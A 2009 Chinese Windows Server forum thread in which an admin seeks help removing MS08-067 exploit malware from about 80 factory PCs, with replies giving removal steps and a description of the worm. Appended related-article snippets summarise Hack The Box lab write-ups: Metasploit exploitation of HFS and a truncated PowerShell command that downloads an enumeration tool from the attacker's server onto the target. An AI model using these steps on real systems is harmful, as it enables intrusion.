社区
Windows Server
帖子详情
可狠的hack.exploit.win32.ms08-067.hh 病毒
ada502
2009-05-18 02:25:29
全厂大概有80台左右的电脑里有这样的病毒。用最新的瑞星杀毒,瑞星提示病毒或病毒感染的文件已删除,可是再重启电脑,瑞星又提示发现病毒,而感染的文件也不一样。网上找了好多的方法都不行,补丁MS08-067也打上了,还是一样杀不尽。而且这个病毒好像有很多变种,其中有一台电脑重装系统之后,发现这样的新病毒:hack.exploit.win32.ms08-067.fy ,而原先的病毒没有了。
...全文
1495
11
打赏
收藏
可狠的hack.exploit.win32.ms08-067.hh 病毒
全厂大概有80台左右的电脑里有这样的病毒。用最新的瑞星杀毒,瑞星提示病毒或病毒感染的文件已删除,可是再重启电脑,瑞星又提示发现病毒,而感染的文件也不一样。网上找了好多的方法都不行,补丁MS08-067也打上了,还是一样杀不尽。而且这个病毒好像有很多变种,其中有一台电脑重装系统之后,发现这样的新病毒:hack.exploit.win32.ms08-067.fy ,而原先的病毒没有了。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
11 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
古井荡月
2009-05-19
打赏
举报
回复
用瑞星不如裸奔。。。
ada502
2009-05-19
打赏
举报
回复
larenv:
我用过的杀毒软件都是最近的了.杀了都没有反应,看样子我快要投降了.
你说的方法我都在网上看到了,也试过了,还是不行啊.超郁闷...
larenv
2009-05-19
打赏
举报
回复
这个病毒可能会自动升级.
再试一下下面这个方法
1、运行“msconfig”,将启动组和服务组项目全部禁用,服务组项目中只剩下几个基本服务无法禁止( 电脑里是3个)(说明:因为不知道是哪个服务引起的,所以全禁了)。
2、然后用最新版本的杀毒软件(2009版以上)杀毒,若想节省时间,那就只查杀内存、引导区、c:\windows\system32。
3、查杀完毕后,重启,用杀毒软件再次查杀,确定无病毒。
4、将先前禁用的启动组项目、服务组项目原路返回(启用),重启。
5、加载正常启动项及服务项后(平时的正常启动),再次杀毒,以保证彻底无病毒。
6、最后下载补丁windowsxp-kb958644-x86-chs,装上即可。
larenv
2009-05-19
打赏
举报
回复
如果彻底的把病毒清理干净,就手动把它删除干净.
就是你重装了系统,也不要忽视了病毒会感染其他盘
ada502
2009-05-19
打赏
举报
回复
今天上午用了NOD32和卡巴,都是半年免费的,卡巴更新到最新,也在安全模式下杀了,还是不能把这个病毒杀掉.
360还用过了,都没有什么反应啊!
看来还没有找到正确的办法的.
hbsgdh
2009-05-19
打赏
举报
回复
建议你换下杀毒软件,试试NOD32
fairchild811
2009-05-18
打赏
举报
回复
这是一个利用微软 MS08-067 漏洞发起攻击的黑客程序。该程序会启动攻击线程开始发起攻击。攻击线程会随机生成IP地址,并试图对该IP地址发起攻击。如果系统没有打 MS08-067 补丁程序则可能受到攻击。攻击成功后会下载一个6767.exe的木马病毒,该木马程序会随时升级。
该病毒会修改注册表键值来使安全卫士360软件功能失效。之后该病毒会结束多种安全软件进程,使其失效。该病毒释放360的IceBreaker的驱动程序,并试图用该驱动来强制删除很多安全软件的文件,并通过删除注册表键值,使一些安全软件无法自动启动。最后,病毒会修改hosts文件,使用户无法正常访问很多安全软件的站点及省级服务器。由于很多用户没有打MS08-067补丁,所以对电脑的安全威胁十分严重。
使用卡巴和360进入安全模式下查杀即可。
ada502
2009-05-18
打赏
举报
回复
larenv:
我的注册表Run下没有找到RUNDLL的值啊,可是我的电脑里有那个病毒啊.是不是它另有别名呢?
还有,这个病毒有没有专杀呢?
akinicn
2009-05-18
打赏
举报
回复
同意楼上的说法
larenv
2009-05-18
打赏
举报
回复
hack是黑客程序。 exploit.win32浏览器里面的系统病毒,
点击我的电脑-工具/文件夹选项-文件夹选项-查看
去掉“隐藏受保护的操作系统文件(推荐)”前面的对钩,
在下面的高级设置列表框中改变不显示隐藏的文件和文件夹选项为显示所有文件和文件夹选项
去掉隐藏已知文件类型的扩展名前面的钩
再点开始/运行,输入regedit确定进入注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键下,在右边找到一个名为Rundll的值.记下数值数据中指示的文件及路径名,一般为C:\WINNT\System32\XXXX.exe的形式.记清这个XXXX.exe所代表的文件名,然后从注册表中删除这个Rundll值;
再打开任务管理器,找到在上面第二步中记下的“XXXX.exe”的进程。找到有相同的进程后选中它并点击结束进程,以结束掉木马进程;
最后打开资源管理器进入到系统目录\Winnt\System32。找到XXXX.exe和XXXX.dll文件直接删除它们;如果在删除过程中发现XXXX.dll删除不掉,而是报告文件正在使用中无法删除,则可以注销或重启一下电脑,然后再按此方法找到并删除它就可以了 。
注意:一定要对系统打全不定,然后断掉网络,再做此工作。最后在使用杀毒软件进行查杀
flyhua1010
2009-05-18
打赏
举报
回复
换个杀毒软件试试
“大连天健网”“中国石油大学”等网站被挂马
据瑞星“云安全”系统统计, 5月25日共有1,220,978人次的网民遭到网页挂马攻击,瑞星共截获了318,815个挂马网址。 当日被挂马网站Top5: 1、“吉他中国新闻中心”:enews.guitarchina.com/movie/,被嵌入的恶意网址为*******.cn/01/ytxxz.htm等。2、“大连天健网”:newqc.runsky.com/user/checking.htm,被...
[
Hack
The Box]靶机8 Optimum
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
HTB Optimum[
Hack
The Box HTB靶场]writeup系列6
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行systeminfo 执行windows-
exploit
-suggester.py 执行ms16-098 0x00 靶机情况 可以看到这台靶机是windows的靶机,难...
hack
the box optimum靶机
首先打开靶场,直接nmap开扫。 nmap -sV -Pn -A 10.10.10.8 通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞 search hfs 使用下面的hfs的命令执行,然后看下要配置哪些东西 use 1 options 需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。 set RHOSTS 10.10.10.8 set LHOSTS 10.10.14.17 run 利用成功后,返回me
渗透测试 ( 3 ) --- Metasploit Framework (MSF)
Metasploit专业版和精简版的主要差别在于专业版上面集成了全自动攻击模块,通过远程API集成网络分割测试模块、标准基线审计向导模块、闭环漏洞验证优先处理功能、动态载荷规避防
病毒
解决方案、钓鱼意识管理和鱼叉式网络钓鱼模块、对OWASP Top 10漏洞的Web应用程序测试模块、高级命令行和Web界面的选择模块。但是,专业版是必须要付费的,所以除非用到非个人的功能,否则没有必要去使用专业版,而且,专业版和精简版的渗透攻击模块是一样的。.........
Windows Server
6,872
社区成员
177,933
社区内容
发帖
与我相关
我的任务
Windows Server
Windows 2016/2012/2008/2003/2000/NT
复制链接
扫一扫
分享
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章